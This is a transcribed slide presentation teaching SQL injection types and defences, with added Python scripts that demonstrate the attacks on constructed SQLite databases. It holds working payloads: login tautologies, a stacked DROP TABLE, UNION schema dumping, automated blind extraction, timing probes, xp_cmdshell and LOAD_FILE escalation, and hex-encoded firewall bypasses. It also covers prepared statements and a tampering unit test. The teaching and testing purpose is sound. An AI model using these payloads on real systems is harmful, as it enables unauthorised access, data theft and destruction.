Jumping Bean SQL Injection Vulnerabilities & How to stop them

Upload: jumping-bean

Post on 15-Jul-2015


Page 1: SQL Injection Vulnerabilities and How to Prevent Them

Jumping Bean

SQL Injection Vulnerabilities & How to stop them

Page 2: About Me

● Mark Clarke – Solutions Architect at Jumping Bean
  – Java developer
  – Linux system administrator
  – Founding member of JoziJUG
● Contact
  – @mxc4 on Twitter
  – LinkedIn

Page 3: Where are we going?

● Why cyber security?
● Attack vectors
● Why SQL injection?
● Types of SQL injection
● How to prevent SQL injection exploits

Page 4: Why Cyber Security?

● Recent notable breaches
  – Sony
  – Target
  – Home Depot
  – LinkedIn
● Who is behind these breaches?
  – Organised crime
  – State-sponsored cyber warfare
● A legal requirement to secure data in many countries

Page 5: Attack Vectors

● People – social engineering, e.g. phishing, impersonation
● Devices – compromising the physical device, e.g. replacing firmware or physical chips
● Operating system – targeting vulnerabilities in the host's operating system
● Network – intercepting or injecting network traffic; network services such as DNS and web proxies
● Platforms – exploiting vulnerabilities in platform stacks, e.g. web servers, database servers, and technology stacks such as Java, .NET and PHP
● Applications – attacking applications directly, either standard applications such as browsers or Flash, or custom applications

Page 6: Why focus on SQL Injection?

Page 7: Web Application Attack Vectors (OWASP Top 10)

Source: OWASP TOP 10 2013

Page 8: The Open Web Application Security Project (OWASP)

● OWASP Top 10 Project – the most critical web application security risks
  – Editions: 2003, 2004, 2007, 2010, 2013
  – Attack vectors change as developers and organisations begin to address the identified risks
  – Provides information to:
    ● understand the risks
    ● help developers address them

Page 9: Web Application Vulnerabilities

Page 10: Injection Attacks

● The application passes data that has not been sanitised to an interpreter of some kind:
  – LDAP queries
  – XPath
  – NoSQL queries
  – SQL queries
  – SMTP
  – command interpreter (shell)

Page 11: APT Attack Methodology

"Advanced persistent threat lifecycle" by Dell SecureWorks - http://www.secureworks.com/cyber-threat-intelligence/advanced-persistent-threats/understand-threat/. Licensed under CC BY-SA 3.0 via Wikimedia Commons

● Sophisticated attacks use “minor” security vulnerabilities to gain access and then escalate their privileges and gain further access to systems

Page 12: What is SQL Injection?

Page 13: What is SQL Injection (SQLi)?

● Unchecked input is used to manipulate the generated SQL statement, changing the logic of the statement
● Most common in weakly typed languages such as PHP and Ruby, where request parameters arrive as strings and are concatenated straight into the query
● But any code that builds SQL (or JPQL) by string concatenation can be vulnerable, e.g. JPQL or JDBC statements in Java
● Manipulation of
  – URL parameters
  – cookies
  – form elements

E.g. POST parameters:

    username="admin"
    pass="SZK!k#$!DD"

or, as a SQL injection:

    pass="' or '1'='1"

The vulnerable code reads the parameters and concatenates them into the query:

    String username = request.getParameter("username");
    String password = request.getParameter("pass");

    // JDBC
    String query = "select id from users where username='" + username
                 + "' and password='" + password + "'";

    // Java Persistence Query Language (JPQL)
    em.createQuery("select id from users where username='" + username
                 + "' and password='" + password + "'");

With the injected password the WHERE clause becomes username='admin' and password='' or '1'='1', which is true for every row, so the login check passes without the password.

Page 14: Types of SQL Injection

● Simple SQL injection
  – Tautologies, logic manipulation
  – Stacked queries
  – Union queries
  – Command injection
● Error based
  – Relies on error messages being output to the screen
● Blind SQL injection
  – Content-based attack
  – Timing attack

Page 15: Simple SQL Injection - Tautologies

● Tautological injections – an always-true condition is appended to the WHERE clause:
  – 1 or 1=1
  – B') or 1=1; --


● "Select desc,price,qty from orders where cust_id=" + id;
● With id = 1 or 1=1 the query becomes
  Select desc,price,qty from orders where cust_id=1 or 1=1;
  which returns every customer's orders, not just one.
● "Select user from users where user='" + username + "' and pass = password('" + pass + "')";
● With username = a and pass = B') or 1=1; -- the query becomes
  Select user from users where user='a' and pass=password('B') or 1=1; -- ');
  The -- comments out the rest of the original statement and or 1=1 matches every user.
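The two tautologies above, run against a database so the effect on the result set can be seen. This is an added example and not code from the deck; it assumes SQLite with constructed rows, a stand-in password() function (SQLite has none), and the column name descr in place of the reserved word desc.

```python
import sqlite3

# Constructed in-memory data (not from the deck) so both slide queries can be
# run as written. Assumptions: SQLite, a stand-in password() function (SQLite
# has none), and the column "descr" instead of the reserved word "desc".
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("password", 1, lambda s: "h(%s)" % s)  # not a real hash
    conn.execute("CREATE TABLE users(user TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "h(SZK!k#$!DD)"), ("alice", "h(wonderland)")])
    conn.execute("CREATE TABLE orders(cust_id INTEGER, descr TEXT, price REAL, qty INTEGER)")
    conn.executemany("INSERT INTO orders VALUES (?, ?, ?, ?)",
                     [(1, "beans", 4.5, 2), (2, "grinder", 80.0, 1), (3, "filters", 3.25, 10)])
    return conn

def orders_sql(cust_id):
    """Numeric parameter concatenated without quotes (the slide's first query)."""
    return "Select descr,price,qty from orders where cust_id=" + cust_id

def login_sql(username, password):
    """String parameters concatenated inside quotes (the slide's second query)."""
    return ("Select user from users where user='" + username
            + "' and pass = password('" + password + "')")

def orders_for(conn, cust_id):
    """Rows the application would render for the (attacker-controlled) id."""
    return conn.execute(orders_sql(cust_id)).fetchall()

def login(conn, username, password):
    """User names the login query matches; a non-empty list means 'logged in'."""
    return [row[0] for row in conn.execute(login_sql(username, password))]

if __name__ == "__main__":
    db = make_db()
    print(orders_sql("1 or 1=1"))
    print(orders_for(db, "1"))                 # one customer's orders
    print(orders_for(db, "1 or 1=1"))          # tautology: every customer's orders
    print(login_sql("a", "B') or 1=1; -- "))
    print(login(db, "admin", "SZK!k#$!DD"))    # legitimate login
    print(login(db, "admin", "wrong"))         # rejected
    print(login(db, "a", "B') or 1=1; -- "))   # bypass: matches every user
```

Note that the second payload leaves a dangling ') after the comment marker; the parser never sees it, which is exactly why the trailing -- is part of the payload.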

Page 16: Demo with WebGoat

Page 17: Simple SQL Injection - Stacking Queries

● Append additional SQL statements after terminating the original query with a semicolon:
  – "SELECT name,email, address FROM members where id=" + id
  – Parameter:
    ● 2; DROP TABLE users --
  – Resulting query:
    SELECT name,email, address FROM members where id=2; DROP TABLE users --
● Whether this works depends on the database and driver rather than the language: JDBC drivers generally refuse to run more than one statement per call by default (MySQL Connector/J, for example, requires allowMultiQueries=true), whereas PHP's mysqli_multi_query and Microsoft SQL Server batches accept stacked statements.
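The driver-dependence above, shown with one database accessed through two APIs: a single-statement call that refuses the stacked DROP and a batch call that runs it. This is an added example, not code from the deck. It assumes SQLite (execute() versus executescript() play the roles of the strict and permissive drivers) and constructed members/users tables; the deck's trailing -- is omitted from the payload because nothing follows the id in this query.

```python
import sqlite3

# Constructed tables (not from the deck): "members" for the slide's query and
# a "users" table for the stacked DROP to hit. The deck's payload ends in "--"
# to comment out whatever follows in the original statement; nothing follows
# here, so the comment is omitted.
PAYLOAD = "2; DROP TABLE users"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE members(id INTEGER, name TEXT, email TEXT, address TEXT)")
    conn.execute("INSERT INTO members VALUES (2, 'Mark', 'mark@example.com', 'Johannesburg')")
    conn.execute("CREATE TABLE users(id INTEGER, name TEXT)")
    return conn

def table_exists(conn, name):
    row = conn.execute("SELECT 1 FROM sqlite_master WHERE type='table' AND name=?",
                       (name,)).fetchone()
    return row is not None

def members_sql(member_id):
    """The slide's query with the id concatenated in."""
    return "SELECT name,email, address FROM members where id=" + member_id

def lookup_single_statement(conn, member_id):
    """Driver API that runs one statement per call (sqlite3 execute()).
    Returns (rows, error): the stacked DROP is refused, not executed."""
    try:
        return conn.execute(members_sql(member_id)).fetchall(), None
    except (sqlite3.ProgrammingError, sqlite3.Warning) as exc:  # Warning on older Pythons
        return None, str(exc)

def lookup_multi_statement(conn, member_id):
    """Driver API that runs a whole batch (sqlite3 executescript(), like
    mysqli_multi_query or a SQL Server batch). Returns whether "users"
    still exists afterwards."""
    conn.executescript(members_sql(member_id))
    return table_exists(conn, "users")

if __name__ == "__main__":
    db = make_db()
    print(lookup_single_statement(db, "2"))        # ([('Mark', ...)], None)
    print(lookup_single_statement(db, PAYLOAD))    # (None, <error text>)
    print(table_exists(db, "users"))               # True: nothing was dropped
    print(lookup_multi_statement(db, PAYLOAD))     # False: the stacked DROP ran
```

The refusal in the first API is a property of that driver's API, not a sanitisation step: the same concatenated string still carries the attacker's SQL, and a different call path (or a driver flag) runs it.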

Page 18: Simple SQL Injection - Union Queries

● Used to exfiltrate data via the UI, e.g. when the result set is used to populate a table for display
● Append a UNION query to the existing query
● The number of columns must match and the column types must be compatible
● "Select prodId, desc, brand,price from product where id=" + id;
  – Parameter: 1 union Select 1,grantee,privilege_type,1 from information_schema.user_privileges
  – The attacker's rows are rendered alongside the real product data
● How to determine the number and type of columns?
  – Parameter: 1 order by 6
    An ORDER BY position larger than the number of selected columns raises an error, so increase the number until the query fails
  – Column types: trial and error
  ● Numeric columns can be made to carry strings with the cast function, or the string is placed in a column that is already text
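The column-count discovery and the UNION that follows it, as an added example that is not part of the deck. It assumes SQLite with a constructed product table; sqlite_master stands in for information_schema (its name and sql columns take the place of grantee and privilege_type). SQLite is lax about column types in a UNION, so the cast step the slide mentions for stricter databases is not needed here.

```python
import sqlite3

# Constructed product and users tables (not from the deck). SQLite's
# sqlite_master plays the role of information_schema: its "name" and "sql"
# columns stand in for the grantee/privilege_type columns the slide reads.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE product(prodId INTEGER, descr TEXT, brand TEXT, price REAL)")
    conn.executemany("INSERT INTO product VALUES (?, ?, ?, ?)",
                     [(1, "espresso beans", "JoziRoast", 9.5), (2, "grinder", "Acme", 80.0)])
    conn.execute("CREATE TABLE users(id INTEGER, name TEXT, pwhash TEXT)")
    return conn

def product_rows(conn, product_id):
    """The slide's listing query with the id concatenated in; the rows are what
    the page would render into its product table."""
    sql = "Select prodId, descr, brand, price from product where prodId=" + product_id
    return conn.execute(sql).fetchall()

def find_column_count(conn, max_cols=20):
    """Step 1: 'order by n' works while n is at most the number of selected
    columns and errors as soon as it is larger, so count upwards until it fails."""
    for n in range(1, max_cols + 1):
        try:
            product_rows(conn, "1 order by %d" % n)
        except sqlite3.OperationalError:
            return n - 1
    return None

def union_dump_tables(conn):
    """Step 2: append a UNION with the right number of columns. The interesting
    strings go in the text columns (2 and 3) and the rest are padded with the
    constant 1, as in the slide's '1,grantee,privilege_type,1'. A non-existent
    id (-1) keeps the real product row out of the result."""
    cols = find_column_count(conn)
    select_list = ["1"] * cols
    select_list[1] = "name"
    select_list[2] = "sql"
    payload = "-1 union Select %s from sqlite_master where type='table'" % ", ".join(select_list)
    return [(row[1], row[2]) for row in product_rows(conn, payload)]

if __name__ == "__main__":
    db = make_db()
    print(find_column_count(db))   # 4
    for name, ddl in union_dump_tables(db):
        print(name, "->", ddl)
```

Every schema object, including the users table and its column names, comes back through the ordinary product listing; that is the exfiltration the slide describes.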

Page 19: SQL Command Injection

● Database-specific stored procedures and functions may allow an attacker to escalate from the database to the host:
  – xp_cmdshell (MSSQL) – runs operating-system commands
  – LOAD_FILE() (MySQL) – reads files from the database server
  – source is a command of the mysql command-line client, not a server function, so it is not reachable through injection
● Registry access (MSSQL):
  ● xp_regaddmultistring
  ● xp_regdeletekey
  ● xp_regdeletevalue
  ● xp_regenumkeys
  ● xp_regenumvalues
  ● xp_regread
● Other MSSQL extended procedures:
  ● media (xp_availablemedia)
  ● ODBC resources (xp_enumdsn)
  ● managing services (xp_servicecontrol)
  ● login mode (xp_loginconfig)
  ● creating cab files (xp_makecab)

Page 20: Error Based SQL Injection

● Relies on poor or non-existent error handling in the code
● Extract data via crafted SQL errors: the database echoes part of the failing statement, and with it the injected input, back to the user, e.g.
  "Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Something' AND Something > ('Something')' at line 1"

Page 21: Blind SQL Injection

● No error message is sent to the screen; the user is either redirected to a standard error page or the page simply fails to render properly
  – Easily implemented with a global error handler
● Bad news – your application is still susceptible to SQL injection
● Blind SQL injection is when the result of the query has to be inferred, either:
  – content based: from differences in the response content or size
  – or from a timing attack

Page 22: Blind SQL Injection - Content Based

● Observe the outcome of parameter tampering, e.g.
  – www.example.com/products.jsp?id=4
  – www.example.com/products.jsp?id=5-1
  If both return the same product, the parameter is evaluated as SQL arithmetic rather than treated as a literal value
● Generate a true and a false result and compare the response differences
  – www.example.com/products.jsp?id=5-6
  – www.example.com/products.jsp?id=5 and 1=0

Page 23: Blind SQL Injection - Timing Based

● MSSQL – waitfor command
  – if (select user) = 'sa' waitfor delay '0:0:10'
● MySQL – sleep(), benchmark()
  – select if(exists(select * from users where username='root'), benchmark(1000000000, md5(1)), 0)
  – select distinct if(table_name='users', sleep(1), table_name) from information_schema.tables
  The response is delayed only when the condition is true
● Exfiltrate data one character at a time by combining a condition with a timing or content difference (MySQL substring(str, pos, len)):
  – Select id,desc,price from products where product=1 and substring((Select TABLE_NAME from information_schema.tables limit 1),1,1)='a';
  – Select id,desc,price from products where product=1 and substring((Select TABLE_NAME from information_schema.tables limit 1),1,1)='b';
  – ... until the first character matches, then move on to the second position:
  – Select id,desc,price from products where product=1 and substring((Select TABLE_NAME from information_schema.tables limit 1),2,1)='a';
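The character-by-character extraction loop from this slide and the content-based slide before it, automated end to end. This is an added example and not part of the deck; it assumes SQLite (sqlite_master standing in for information_schema.tables, substr() for MySQL's substring()) and a constructed products table. SQLite has no sleep() or benchmark(), so the true/false signal here is whether the page renders a product rather than how long the response takes; the loop is the same for a timing oracle.

```python
import sqlite3
import string

# Constructed schema (not from the deck); sqlite_master stands in for
# information_schema.tables and SQLite's substr() for MySQL's substring().
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products(id INTEGER, descr TEXT, price REAL)")
    conn.execute("INSERT INTO products VALUES (1, 'beans', 9.5)")
    return conn

def page_has_content(conn, product_param):
    """The only signal a blind attacker gets: did the page render a product
    (the query returned rows) or not. Errors are swallowed, as a global error
    handler would."""
    sql = "Select id,descr,price from products where id=" + product_param
    try:
        return len(conn.execute(sql).fetchall()) > 0
    except sqlite3.Error:
        return False

SECRET = "(select name from sqlite_master where type='table' limit 1)"
ALPHABET = string.ascii_lowercase + string.digits + "_"

def find_length(conn, max_len=64):
    """One true/false probe per candidate length of the hidden string."""
    for n in range(1, max_len + 1):
        if page_has_content(conn, "1 and length(%s)=%d" % (SECRET, n)):
            return n
    return None

def extract_first_table_name(conn):
    """Boolean-based blind extraction: for each position, try every character
    until the page renders (condition true). Returns (name, probes_sent)."""
    length = find_length(conn)
    name, probes = "", 0
    for pos in range(1, length + 1):
        for c in ALPHABET:
            probes += 1
            if page_has_content(conn, "1 and substr(%s,%d,1)='%s'" % (SECRET, pos, c)):
                name += c
                break
        else:
            raise ValueError("character %d is not in the alphabet" % pos)
    return name, probes

if __name__ == "__main__":
    db = make_db()
    print(find_length(db))                # 8
    print(extract_first_table_name(db))   # ('products', 116)
```

The probe count is the practical cost of blind injection: over a hundred requests for one eight-character name with a linear search, which is why tools such as sqlmap use a binary search over character codes instead and why request-rate anomalies are a useful detection signal.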

Page 24: SQL Injection Prevention Measures

● Web application firewalls (WAF)
  – Used to protect against unknown or not-yet-patched vulnerabilities
  – mod_security for Apache
  – Use pattern-matching rules
  – Problem: easy to bypass by encoding the payload so that it no longer matches the signatures:
    ● char() function
    ● Select 0xaa → hexadecimal bypass
    ● SELECT CONCAT('0x', HEX('c:\\boot.ini')) gives the hex form of the path
    ● SELECT LOAD_FILE(0x633A5C626F6F742E696E69) reads c:\boot.ini without the string ever appearing in the request
● SQL whitelisting
  – Input validation, sanitisation routines
  – PHP addslashes and mysql_real_escape_string have known weaknesses: multi-byte character sets can defeat the escaping, and the mysql_* functions are removed in PHP 7
● Not the best ways – these reduce exposure but do not remove the root cause

Page 25: Coding Best Practice

● Use prepared statements (parameterised queries)
  – Java
    ● JDBC prepared statements
    ● JPA createQuery with named parameters or positional placeholders
    ● The Criteria API
  – PHP
    ● PDO with bound parameters
● Stored procedures – only help when the procedure itself does not build dynamic SQL from its arguments

● JDBC (con is an open java.sql.Connection)

    String updateString = "update COFFEES set TOTAL = TOTAL + ? where COF_NAME = ?";
    PreparedStatement updateSales = con.prepareStatement(updateString);
    updateSales.setInt(1, 300);
    updateSales.setString(2, "Java");
    updateSales.executeUpdate();

● JPA

    Query qry = em.createQuery("SELECT c FROM Customer c WHERE c.cust_id = :cust_id");
    qry.setParameter("cust_id", cust_id);
    qry.getSingleResult();

Page 26: SQL Injection Testing

● Write unit tests that submit tampered parameters and assert that they are rejected
● Penetration testing tools (fuzzing):
  – sqlmap
  – sqlninja
  – Zed Attack Proxy (ZAP) from OWASP
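The prepared-statement fix from the coding best practice slide and the parameter-tampering unit test from the testing slide, together in one added example that is not code from the deck. It assumes SQLite with a constructed users table and a stand-in password() function (SQLite has none); login_concat is the concatenated query from the tautology slide, kept only as the "before" case, and login_prepared is the parameterised rewrite.

```python
import sqlite3

# Constructed users table (not from the deck) with a stand-in password()
# function, since SQLite has none. login_concat is the vulnerable shape from
# the tautology slide, kept as the "before"; login_prepared is the fix.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.create_function("password", 1, lambda s: "h(%s)" % s)  # not a real hash
    conn.execute("CREATE TABLE users(user TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "h(SZK!k#$!DD)"), ("alice", "h(wonderland)")])
    return conn

def login_concat(conn, username, password):
    """Before: values spliced into the SQL text, so they are parsed as SQL."""
    sql = ("Select user from users where user='" + username
           + "' and pass = password('" + password + "')")
    return [row[0] for row in conn.execute(sql)]

def login_prepared(conn, username, password):
    """After: the statement is fixed text with '?' placeholders; the values are
    bound separately and never reach the SQL parser, whatever they contain."""
    sql = "Select user from users where user=? and pass = password(?)"
    return [row[0] for row in conn.execute(sql, (username, password))]

# Tampered parameters: the deck's two tautologies, a comment-out and a stacked
# query. None of them should ever log anyone in.
TAMPER_CASES = [
    ("a", "B') or 1=1; -- "),
    ("admin' -- ", "anything"),
    ("' or '1'='1", "' or '1'='1"),
    ("a", "'; DROP TABLE users; -- "),
]

def tamper_outcomes(login_fn, conn):
    """Unit-test style check: classify each payload as 'ok' (rejected),
    'bypass' (logged in) or 'error' (database error leaked to the caller,
    which is what error-based injection feeds on)."""
    outcomes = []
    for username, password in TAMPER_CASES:
        try:
            outcomes.append("bypass" if login_fn(conn, username, password) else "ok")
        except (sqlite3.Error, sqlite3.Warning):
            outcomes.append("error")
    return outcomes

def is_injection_safe(login_fn, conn):
    """What the unit test asserts: every payload rejected and the table intact."""
    outcomes = tamper_outcomes(login_fn, conn)
    intact = conn.execute("SELECT count(*) FROM sqlite_master WHERE name='users'").fetchone()[0] == 1
    return all(o == "ok" for o in outcomes) and intact

if __name__ == "__main__":
    db = make_db()
    print(tamper_outcomes(login_concat, db))          # ['bypass', 'bypass', 'ok', 'error']
    print(tamper_outcomes(login_prepared, db))        # ['ok', 'ok', 'ok', 'ok']
    print(login_prepared(db, "admin", "SZK!k#$!DD"))  # ['admin']: legitimate login still works
```

The third payload happens not to bypass the concatenated query because of the password() wrapper, and the fourth only produces a syntax error; a test that stops at "no bypass" would miss both the error leak and the fact that the same code is one query shape away from being exploitable, which is why the check treats anything other than a clean rejection as a failure.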